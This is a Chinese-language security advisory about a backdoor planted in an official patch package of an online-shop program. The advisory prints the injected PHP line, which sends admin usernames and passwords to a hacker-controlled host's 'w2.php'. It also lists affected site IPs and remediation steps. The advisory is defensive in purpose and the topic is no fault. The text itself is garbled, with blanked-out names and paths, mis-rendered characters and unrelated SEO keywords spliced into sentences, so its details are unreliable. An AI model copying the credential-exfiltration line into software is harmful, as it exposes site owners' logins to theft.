目前官方已經(jīng)在6月3日發(fā)布了新的補(bǔ)丁包

()，請(qǐng)及時(shí)檢查并修復(fù)。

網(wǎng)站安全中心在此提醒廣大站長(zhǎng)，在為自己的網(wǎng)絡(luò)程序下載補(bǔ)丁文件時(shí)，務(wù)必進(jìn)行相應(yīng)檢查。 即使補(bǔ)丁文件是從官網(wǎng)下載的，也有可能感染惡意后門(mén)。 使用本網(wǎng)店程序的站長(zhǎng)可以登錄： #為自己的站點(diǎn)做一次安全檢查網(wǎng)站制作，平時(shí)登錄網(wǎng)站安全中心，第一時(shí)間了解自己網(wǎng)站的安全情況。

是很多站長(zhǎng)喜歡使用的網(wǎng)店程序，其V2.7.3版本擁有眾多用戶(hù)。

2013年5月seo優(yōu)化，網(wǎng)站安全中心曾響應(yīng)網(wǎng)店程序后門(mén)事件。 我以為事情已經(jīng)結(jié)束了。 沒(méi)想到近日，又有安全研究員在漏洞平臺(tái)上發(fā)現(xiàn)了官方補(bǔ)丁的后門(mén)代碼。

網(wǎng)站安全研究人員分析發(fā)現(xiàn)，本次后門(mén)代碼存在于編號(hào)為.的歷史補(bǔ)丁文件包中。 黑客篡改補(bǔ)丁包中的(\\.php)文件后，插入一段記錄后臺(tái)用戶(hù)和密碼信息的代碼，發(fā)送到黑客控制的服務(wù)器上。 值得注意的是php 開(kāi)源網(wǎng)店系統(tǒng)，安全研究人員并未在前兩次補(bǔ)丁的后門(mén)代碼中發(fā)現(xiàn)該后門(mén)代碼，因此本次后門(mén)事件可能發(fā)生在前兩次篡改之前。

該黑客植入的后門(mén)代碼：

文件 \\.php 代碼行 113-114：

@('http://[馬賽

g]/api///w2.php?='.$[''].'&='.$[''].'---'.$[''].'---'.date ('Ymd|H:i:s').'---'.$[''].$['']);

通過(guò)進(jìn)一步分析發(fā)現(xiàn)，“[]/”網(wǎng)站實(shí)際上是一個(gè)被黑客控制的網(wǎng)站（“肉雞”），黑客用來(lái)收集密碼等信息的文件目錄也可以“遍歷文件”，如如圖所示：

經(jīng)過(guò)網(wǎng)站安全研究人員下載和去重后，發(fā)現(xiàn)約有90個(gè)域名網(wǎng)站受到影響。 名單如下：

.cn

121.11.65.175:8085

117.34.74.168

網(wǎng)站安全研究中心推薦的解決方案：

1、使用的站長(zhǎng)朋友，查看上面公布的域名php 開(kāi)源網(wǎng)店系統(tǒng)，查看\\.php文件內(nèi)容，搜索關(guān)鍵詞“w2.php”。 如果您發(fā)現(xiàn)上述惡意代碼，請(qǐng)直接刪除并保存。

2、修改所有后臺(tái)權(quán)限用戶(hù)的密碼，并通知本站所有用戶(hù)修改密碼。

3. 查看網(wǎng)站和服務(wù)器的安全狀態(tài)。